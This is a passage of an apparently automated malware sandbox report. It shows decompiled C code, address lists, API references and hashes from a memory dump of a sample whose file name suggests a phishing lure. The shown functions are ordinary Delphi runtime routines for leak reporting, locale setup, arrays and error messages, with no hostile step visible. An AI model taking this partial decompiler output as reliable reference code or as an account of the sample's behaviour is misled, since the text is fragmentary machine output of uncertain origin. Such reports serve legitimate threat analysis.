					__eflags = _t131;
					if(_t131 == 0) {
						L12:
						_t180 =  *((intOrPtr*)(_t180 + 4));
						continue;
					} else {
						goto L5;
					}
					do {
						L5:
						_t194 =  *(_t131 - 4);
						__eflags = _t194 & 0x00000001;
						if((_t194 & 0x00000001) == 0) {
							__eflags = _t194 & 0x00000004;
							if(__eflags == 0) {
								__eflags = _v112652 - 0x1000;
								if(_v112652 < 0x1000) {
									_v112664 = (_t194 & 0xfffffff0) - 4;
									_t126 = E025123BC(_t131);
									__eflags = _t126;
									if(_t126 == 0) {
										_v112645 = 0;
										 *((intOrPtr*)(_t198 + _v112652 * 4 - 0x1f828)) = _v112664;
										_t18 =  &_v112652;
										 *_t18 = _v112652 + 1;
										__eflags =  *_t18;
									}
								}
							} else {
								E02512414(_t131, __eflags, _t198);
							}
						}
						_t79 = E02512054(_t131);
						_t131 = _t79;
						__eflags = _t131;
					} while (_t131 != 0);
					goto L12;
				}
				_t132 =  *0x256c7a8; // 0x7ef90000
				while(_t132 != 0x256c7a4 && _v112652 < 0x1000) {
					_t79 = E025123BC(_t132 + 0x10);
					__eflags = _t79;
					if(_t79 == 0) {
						_v112645 = 0;
						_t22 = _t132 + 0xc; // 0x80004
						_t79 = _v112652;
						 *((intOrPtr*)(_t198 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
						_t27 =  &_v112652;
						 *_t27 = _v112652 + 1;
						__eflags =  *_t27;
					}
					_t29 = _t132 + 4; // 0x7f010000
					_t132 =  *_t29;
				}
				if(_v112645 != 0) {
					L49:
					return _t79;
				}
				_v112653 = 0;
				_v112668 = 0;
				_t134 = E02512210(0x28,  &_v161836);
				_v112660 = 0x37;
				_v112680 = 0x252d046;
				_v112684 =  &_v110600;
				do {
					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
					_v112654 = 0;
					_t182 = 0xff;
					_t188 = _v112684;
					while(_t134 <=  &_v131117) {
						if( *_t188 > 0) {
							if(_v112653 == 0) {
								_t134 = E02512210(0x27, _t134);
								_v112653 = 1;
							}
							if(_v112654 != 0) {
								 *_t134 = 0x2c;
								_t139 = _t134 + 1;
								 *_t139 = 0x20;
								_t140 = _t139 + 1;
								__eflags = _t139 + 1;
							} else {
								 *_t134 = 0xd;
								 *((char*)(_t134 + 1)) = 0xa;
								_t147 = E025120F4(_v112668 + 1, _t134 + 2);
								 *_t147 = 0x20;
								_t148 = _t147 + 1;
								 *_t148 = 0x2d;
								 *((char*)(_t148 + 1)) = 0x20;
								_t140 = E02512210(8, E025120F4(_v112672, _t148 + 2));
								_v112654 = 1;
							}
							_t214 = _t182 - 1;
							if(_t214 < 0) {
								_t141 = E02512210(7, _t140);
							} else {
								if(_t214 == 0) {
									_t141 = E02512210(6, _t140);
								} else {
									E02513BD8( *((intOrPtr*)(_t188 - 4)),  &_v162092);
									_t141 = E02512210(_v162092 & 0x000000ff, _t140);
								}
							}
							 *_t141 = 0x20;
							_t142 = _t141 + 1;
							 *_t142 = 0x78;
							 *((char*)(_t142 + 1)) = 0x20;
							_t134 = E025120F4( *_t188, _t142 + 2);
						}
						_t182 = _t182 - 1;
						_t188 = _t188 - 8;
						if(_t182 != 0xffffffff) {
							continue;
						} else {
							goto L38;
						}
					}
					L38:
					_v112668 = _v112672;
					_v112684 = _v112684 + 0x800;
					_v112680 =  &(_v112680[0x10]);
					_t60 =  &_v112660;
					 *_t60 = _v112660 - 1;
				} while ( *_t60 != 0);
				if(_v112652 <= 0) {
					L48:
					E02512210(3, _t134);
					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
					goto L49;
				}
				if(_v112653 != 0) {
					 *_t134 = 0xd;
					_t136 = _t134 + 1;
					 *_t136 = 0xa;
					_t137 = _t136 + 1;
					 *_t137 = 0xd;
					_t138 = _t137 + 1;
					 *_t138 = 0xa;
					_t134 = _t138 + 1;
				}
				_t134 = E02512210(0x3c, _t134);
				_t184 = _v112652 - 1;
				if(_t184 >= 0) {
					_t185 = _t184 + 1;
					_v112676 = 0;
					_t189 =  &_v129068;
					L44:
					L44:
					if(_v112676 != 0) {
						 *_t134 = 0x2c;
						_t135 = _t134 + 1;
						 *_t135 = 0x20;
						_t134 = _t135 + 1;
					}
					_t134 = E025120F4( *_t189, _t134);
					if(_t134 >  &_v131117) {
						goto L48;
					}
					_v112676 =  &(_v112676->i);
					_t189 = _t189 + 4;
					_t185 = _t185 - 1;
					if(_t185 != 0) {
						goto L44;
					}
				}
				L2:
				_t200 = _t200 + 0xfffff004;
				_push(_t73);
				_t73 = _t73 - 1;
				if(_t73 != 0) {
					goto L2;
				} else {
					E02513518( &_v112644, 0x1b800);
					E02513518( &_v129068, 0x4000);
					_t79 = 0;
					_v112652 = 0;
					_v112645 = 1;
					_t180 =  *0x256a704; // 0x2920000
					goto L13;
				}
			}















































                                                                0x02512561
                                                                0x02512563
                                                                0x02512564
                                                                0x02512564
                                                                0x00000000
                                                                0x0251263f
                                                                0x025125bf
                                                                0x025125c4
                                                                0x025125c6
                                                                0x025125c8
                                                                0x0251263c
                                                                0x0251263c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x025125ca
                                                                0x025125ca
                                                                0x025125cf
                                                                0x025125d1
                                                                0x025125d7
                                                                0x025125d9
                                                                0x025125df
                                                                0x025125ec
                                                                0x025125f6
                                                                0x025125fe
                                                                0x02512606
                                                                0x0251260b
                                                                0x0251260d
                                                                0x0251260f
                                                                0x02512622
                                                                0x02512629
                                                                0x02512629
                                                                0x02512629
                                                                0x02512629
                                                                0x0251260d
                                                                0x025125e1
                                                                0x025125e4
                                                                0x025125e9
                                                                0x025125df
                                                                0x02512631
                                                                0x02512636
                                                                0x02512638
                                                                0x02512638
                                                                0x00000000
                                                                0x025125ca
                                                                0x0251264b
                                                                0x0251268a
                                                                0x02512658
                                                                0x0251265d
                                                                0x0251265f
                                                                0x02512661
                                                                0x02512668
                                                                0x02512674
                                                                0x0251267a
                                                                0x02512681
                                                                0x02512681
                                                                0x02512681
                                                                0x02512681
                                                                0x02512687
                                                                0x02512687
                                                                0x02512687
                                                                0x025126a5
                                                                0x02512903
                                                                0x02512909
                                                                0x02512909
                                                                0x025126ab
                                                                0x025126b4
                                                                0x025126cf
                                                                0x025126d1
                                                                0x025126db
                                                                0x025126eb
                                                                0x025126f1
                                                                0x025126fd
                                                                0x02512703
                                                                0x0251270a
                                                                0x02512715
                                                                0x02512717
                                                                0x02512728
                                                                0x02512735
                                                                0x02512748
                                                                0x0251274a
                                                                0x0251274a
                                                                0x02512758
                                                                0x025127a9
                                                                0x025127ac
                                                                0x025127ad
                                                                0x025127b0
                                                                0x025127b0
                                                                0x0251275a
                                                                0x0251275a
                                                                0x0251275e
                                                                0x02512770
                                                                0x02512772
                                                                0x02512775
                                                                0x02512776
                                                                0x0251277a
                                                                0x0251279e
                                                                0x025127a0
                                                                0x025127a0
                                                                0x025127b3
                                                                0x025127b6
                                                                0x025127cd
                                                                0x025127b8
                                                                0x025127b8
                                                                0x025127e2
                                                                0x025127ba
                                                                0x025127ef
                                                                0x02512808
                                                                0x02512808
                                                                0x025127b8
                                                                0x0251280a
                                                                0x0251280d
                                                                0x0251280e
                                                                0x02512812
                                                                0x0251281f
                                                                0x0251281f
                                                                0x02512821
                                                                0x02512822
                                                                0x02512828
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x02512828
                                                                0x0251282e
                                                                0x02512834
                                                                0x0251283a
                                                                0x02512844
                                                                0x0251284b
                                                                0x0251284b
                                                                0x0251284b
                                                                0x0251285e
                                                                0x025128da
                                                                0x025128e6
                                                                0x025128fe
                                                                0x00000000
                                                                0x025128fe
                                                                0x02512867
                                                                0x02512869
                                                                0x0251286c
                                                                0x0251286d
                                                                0x02512870
                                                                0x02512871
                                                                0x02512874
                                                                0x02512875
                                                                0x02512878
                                                                0x02512878
                                                                0x0251288a
                                                                0x02512892
                                                                0x02512895
                                                                0x02512897
                                                                0x02512898
                                                                0x025128a2
                                                                0x00000000
                                                                0x025128a8
                                                                0x025128af
                                                                0x025128b1
                                                                0x025128b4
                                                                0x025128b5
                                                                0x025128b8
                                                                0x025128b8
                                                                0x025128c2
                                                                0x025128cc
                                                                0x00000000
                                                                0x00000000
                                                                0x025128ce
                                                                0x025128d4
                                                                0x025128d7
                                                                0x025128d8
                                                                0x00000000
                                                                0x00000000
                                                                0x025128d8
                                                                0x02512569
                                                                0x02512569
                                                                0x0251256f
                                                                0x02512570
                                                                0x02512571
                                                                0x00000000
                                                                0x02512573
                                                                0x0251258c
                                                                0x0251259e
                                                                0x025125a3
                                                                0x025125a5
                                                                0x025125ab
                                                                0x025125b2
                                                                0x00000000
                                                                0x025125b2

                                                                Strings
                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02512879
                                                                • Unexpected Memory Leak, xrefs: 025128F0
                                                                • , xrefs: 02512844
                                                                • 7, xrefs: 025126D1
                                                                • bytes: , xrefs: 0251278D
                                                                • The unexpected small block leaks are:, xrefs: 02512737
                                                                • An unexpected memory leak has occurred. , xrefs: 025126C0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                • API String ID: 0-2723507874
                                                                • Opcode ID: 8eb76d2c27bfd29a0c7d6e17a13711e86c582e26836f690e978950f0a8aa3c3e
                                                                • Instruction ID: f0340b32a79c07b0e6ccb26e9f1c06597361ab1ef63aa3703c23b573fa879cfc
                                                                • Opcode Fuzzy Hash: 8eb76d2c27bfd29a0c7d6e17a13711e86c582e26836f690e978950f0a8aa3c3e
                                                                • Instruction Fuzzy Hash: D671D330B042B88FFF219A2CC884BD9BAE5FB49714F1041E5D849DB285DB798AC5CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251BF84 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 72%
                                                                			E0251BF84(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x251c24f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0251BEC0();
				E0251AA84(__ebx, __edi, __esi);
				_t196 =  *0x256c8d0;
				if( *0x256c8d0 != 0) {
					E0251AC5C(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0251A9D0(_t43, 0, 0x14,  &_v20);
				E025148F4(0x256c804, _v20);
				E0251A9D0(_t43, 0x251c264, 0x1b,  &_v24);
				 *0x256c808 = E02517DDC(0x251c264, 0, _t196);
				E0251A9D0(_t132, 0x251c264, 0x1c,  &_v28);
				 *0x256c809 = E02517DDC(0x251c264, 0, _t196);
				 *0x256c80a = E0251AA1C(_t132, 0x2c, 0xf);
				 *0x256c80b = E0251AA1C(_t132, 0x2e, 0xe);
				E0251A9D0(_t132, 0x251c264, 0x19,  &_v32);
				 *0x256c80c = E02517DDC(0x251c264, 0, _t196);
				 *0x256c80d = E0251AA1C(_t132, 0x2f, 0x1d);
				E0251A9D0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0251AD0C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E025148F4(0x256c810, _v36);
				E0251A9D0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0251AD0C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E025148F4(0x256c814, _v44);
				 *0x256c818 = E0251AA1C(_t132, 0x3a, 0x1e);
				E0251A9D0(_t132, 0x251c298, 0x28,  &_v52);
				E025148F4(0x256c81c, _v52);
				E0251A9D0(_t132, 0x251c2a4, 0x29,  &_v56);
				E025148F4(0x256c820, _v56);
				E025148A0( &_v12);
				E025148A0( &_v16);
				E0251A9D0(_t132, 0x251c264, 0x25,  &_v60);
				_t104 = E02517DDC(0x251c264, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E02514938( &_v8, 0x251c2bc);
				} else {
					E02514938( &_v8, 0x251c2b0);
				}
				E0251A9D0(_t132, 0x251c264, 0x23,  &_v64);
				_t111 = E02517DDC(0x251c264, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0251A9D0(_t132, 0x251c264, 0x1005,  &_v68);
					if(E02517DDC(0x251c264, 0, _t198) != 0) {
						E02514938( &_v12, 0x251c2d8);
					} else {
						E02514938( &_v16, 0x251c2c8);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E02514C24();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E02514C24();
				 *0x256c8d2 = E0251AA1C(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0251C256);
				return E025148C4( &_v68, 0x10);
			}

























                                                                0x0251bf84
                                                                0x0251bf84
                                                                0x0251bf85
                                                                0x0251bf87
                                                                0x0251bf8c
                                                                0x0251bf8c
                                                                0x0251bf8e
                                                                0x0251bf90
                                                                0x0251bf90
                                                                0x0251bf93
                                                                0x0251bf96
                                                                0x0251bf97
                                                                0x0251bf9c
                                                                0x0251bf9f
                                                                0x0251bfa2
                                                                0x0251bfa7
                                                                0x0251bfac
                                                                0x0251bfb3
                                                                0x0251bfb5
                                                                0x0251bfb5
                                                                0x0251bfbf
                                                                0x0251bfce
                                                                0x0251bfdb
                                                                0x0251bff0
                                                                0x0251bfff
                                                                0x0251c014
                                                                0x0251c023
                                                                0x0251c036
                                                                0x0251c049
                                                                0x0251c05e
                                                                0x0251c06d
                                                                0x0251c080
                                                                0x0251c095
                                                                0x0251c0a0
                                                                0x0251c0ad
                                                                0x0251c0c2
                                                                0x0251c0cd
                                                                0x0251c0da
                                                                0x0251c0ed
                                                                0x0251c102
                                                                0x0251c10f
                                                                0x0251c124
                                                                0x0251c131
                                                                0x0251c139
                                                                0x0251c141
                                                                0x0251c156
                                                                0x0251c160
                                                                0x0251c165
                                                                0x0251c167
                                                                0x0251c180
                                                                0x0251c169
                                                                0x0251c171
                                                                0x0251c171
                                                                0x0251c195
                                                                0x0251c19f
                                                                0x0251c1a4
                                                                0x0251c1a6
                                                                0x0251c1b8
                                                                0x0251c1c9
                                                                0x0251c1e2
                                                                0x0251c1cb
                                                                0x0251c1d3
                                                                0x0251c1d3
                                                                0x0251c1c9
                                                                0x0251c1e7
                                                                0x0251c1ea
                                                                0x0251c1ed
                                                                0x0251c1f2
                                                                0x0251c1ff
                                                                0x0251c204
                                                                0x0251c207
                                                                0x0251c20a
                                                                0x0251c20f
                                                                0x0251c21c
                                                                0x0251c22f
                                                                0x0251c236
                                                                0x0251c239
                                                                0x0251c23c
                                                                0x0251c24e

                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000000,0251C24F,?,?,00000000,00000000), ref: 0251BFBA
                                                                  • Part of subcall function 0251A9D0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0251A9EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Locale$InfoThread
                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                • API String ID: 4232894706-2493093252
                                                                • Opcode ID: 66e09f3296affcbc7cb2092d55300fff5c9221c064742166beeee9eab43301c2
                                                                • Instruction ID: 21f0150e1b9f25d3e39d859a0b052ed0445cc5756e3ba22558682af15570367f
                                                                • Opcode Fuzzy Hash: 66e09f3296affcbc7cb2092d55300fff5c9221c064742166beeee9eab43301c2
                                                                • Instruction Fuzzy Hash: F661AE34B4028A9BFB05EBE8C844AEF77E7BBC8701F109436E041AB245CA39C945DB5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251E5CC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 77%
                                                                			E0251E5CC(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0251E20C(0x80070057);
				}
				_t47 =  *_t91 & 0x0000ffff;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0251CFCC();
					return E0251E20C(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 = _t91[4];
					} else {
						_v792 =  *(_t91[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0251D424();
						_t113 = _t54;
						if(_t113 == 0) {
							E0251DF64(_t100);
						}
						E0251E524(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0251E540(_v788 - 1, _t115) != 0) {
								L0251D43C();
								E0251E20C(_v792);
								L0251D43C();
								E0251E20C( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0251E570(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0251D42C();
							E0251E20C(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0251D434();
							E0251E20C(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                                0x0251e5cc
                                                                0x0251e5d8
                                                                0x0251e5de
                                                                0x0251e5e0
                                                                0x0251e5ea
                                                                0x0251e5f1
                                                                0x0251e5f1
                                                                0x0251e5f6
                                                                0x0251e604
                                                                0x0251e77d
                                                                0x0251e784
                                                                0x0251e785
                                                                0x00000000
                                                                0x0251e60a
                                                                0x0251e60d
                                                                0x0251e61f
                                                                0x0251e60f
                                                                0x0251e614
                                                                0x0251e614
                                                                0x0251e62e
                                                                0x0251e63a
                                                                0x0251e63d
                                                                0x0251e6aa
                                                                0x0251e6b0
                                                                0x0251e6b1
                                                                0x0251e6b7
                                                                0x0251e6b8
                                                                0x0251e6ba
                                                                0x0251e6bf
                                                                0x0251e6c3
                                                                0x0251e6c5
                                                                0x0251e6c5
                                                                0x0251e6d0
                                                                0x0251e6db
                                                                0x0251e6e6
                                                                0x0251e6ef
                                                                0x0251e6f2
                                                                0x0251e70e
                                                                0x0251e715
                                                                0x0251e720
                                                                0x0251e737
                                                                0x0251e73c
                                                                0x0251e750
                                                                0x0251e755
                                                                0x0251e768
                                                                0x0251e768
                                                                0x0251e771
                                                                0x0251e6f4
                                                                0x0251e6f4
                                                                0x0251e6f5
                                                                0x0251e6fb
                                                                0x0251e701
                                                                0x0251e703
                                                                0x0251e705
                                                                0x0251e708
                                                                0x0251e70b
                                                                0x0251e70b
                                                                0x0251e70e
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0251e70e
                                                                0x0251e63f
                                                                0x0251e63f
                                                                0x0251e640
                                                                0x0251e642
                                                                0x0251e648
                                                                0x0251e64a
                                                                0x0251e659
                                                                0x0251e65a
                                                                0x0251e664
                                                                0x0251e665
                                                                0x0251e66a
                                                                0x0251e675
                                                                0x0251e676
                                                                0x0251e680
                                                                0x0251e681
                                                                0x0251e686
                                                                0x0251e6a1
                                                                0x0251e6a3
                                                                0x0251e6a4
                                                                0x0251e6a7
                                                                0x0251e6a7
                                                                0x00000000
                                                                0x0251e648
                                                                0x0251e63d

                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0251E665
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0251E681
                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0251E6BA
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0251E737
                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0251E750
                                                                • VariantCopy.OLEAUT32(?), ref: 0251E785
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                • String ID:
                                                                • API String ID: 351091851-3916222277
                                                                • Opcode ID: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                • Instruction ID: 078b41783a137e6215484ea1f47a167552d742aebf490e0e6e6e86c4f2d7aeb1
                                                                • Opcode Fuzzy Hash: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                • Instruction Fuzzy Hash: 85510B7590162E9BEB26DB58C891BD9B7BDBF88300F4041D5EA09E7201D770AF808F69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02514720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 79%
                                                                			E02514720(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x256a044 == 0) {
					if( *0x252d030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x256a218 == 0xd7b2 &&  *0x256a220 > 0) {
						 *0x256a230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E025147A8, 2,  &_v4, 0);
				}
			}





                                                                0x02514728
                                                                0x02514788
                                                                0x02514798
                                                                0x02514798
                                                                0x0251479e
                                                                0x0251472a
                                                                0x02514733
                                                                0x02514743
                                                                0x02514743
                                                                0x0251475f
                                                                0x02514780
                                                                0x02514780

                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?,0256C7C0,?,?,0252D7CC,025167FD,0252C2BD), ref: 02514759
                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?,0256C7C0,?,?,0252D7CC,025167FD,0252C2BD), ref: 0251475F
                                                                • GetStdHandle.KERNEL32(000000F5,025147A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?,0256C7C0), ref: 02514774
                                                                • WriteFile.KERNEL32(00000000,000000F5,025147A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,025147E7,?,?), ref: 0251477A
                                                                • MessageBoxA.USER32 ref: 02514798
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileHandleWrite$Message
                                                                • String ID: Error$Runtime error at 00000000
                                                                • API String ID: 1570097196-2970929446
                                                                • Opcode ID: 7e2ca54f1a094b56d33ad19a3a6ed195d94fdef64d5ae14cd35e119c897ffba4
                                                                • Instruction ID: 1e461204f78f530b12c03fb6e0f3d03530bc09e991df8232ed9ccf7c66b00f1d
                                                                • Opcode Fuzzy Hash: 7e2ca54f1a094b56d33ad19a3a6ed195d94fdef64d5ae14cd35e119c897ffba4
                                                                • Instruction Fuzzy Hash: 6EF0BBA0AC530578FB106764DD49F69377C7B82F11F348B45F754B60C097A454C9A62D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0251B0D0 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0251B0D0(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0251AF48(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x2569d64; // 0x256a044
				if( *_t14 == 0) {
					_t16 =  *0x2569c60; // 0x2516b6c
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x256c7f0; // 0x2510000
					LoadStringA(E02515AF0(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x2569c84; // 0x256a214
				E02512D28(E025133B0(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E025182E4( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x251b194, 2,  &_v1092, 0);
			}












                                                                0x0251b0df
                                                                0x0251b0e4
                                                                0x0251b0ec
                                                                0x0251b153
                                                                0x0251b158
                                                                0x0251b15c
                                                                0x0251b167
                                                                0x00000000
                                                                0x0251b17d
                                                                0x0251b0ee
                                                                0x0251b0f8
                                                                0x0251b107
                                                                0x0251b117
                                                                0x0251b12a
                                                                0x00000000

                                                                APIs
                                                                  • Part of subcall function 0251AF48: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0251AF65
                                                                  • Part of subcall function 0251AF48: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0251AF89
                                                                  • Part of subcall function 0251AF48: GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 0251AFA4
                                                                  • Part of subcall function 0251AF48: LoadStringA.USER32 ref: 0251B03A
                                                                • CharToOemA.USER32 ref: 0251B107
                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0251B124
                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0251B12A
                                                                • GetStdHandle.KERNEL32(000000F4,0251B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0251B13F
                                                                • WriteFile.KERNEL32(00000000,000000F4,0251B194,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0251B145
                                                                • LoadStringA.USER32 ref: 0251B167
                                                                • MessageBoxA.USER32 ref: 0251B17D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
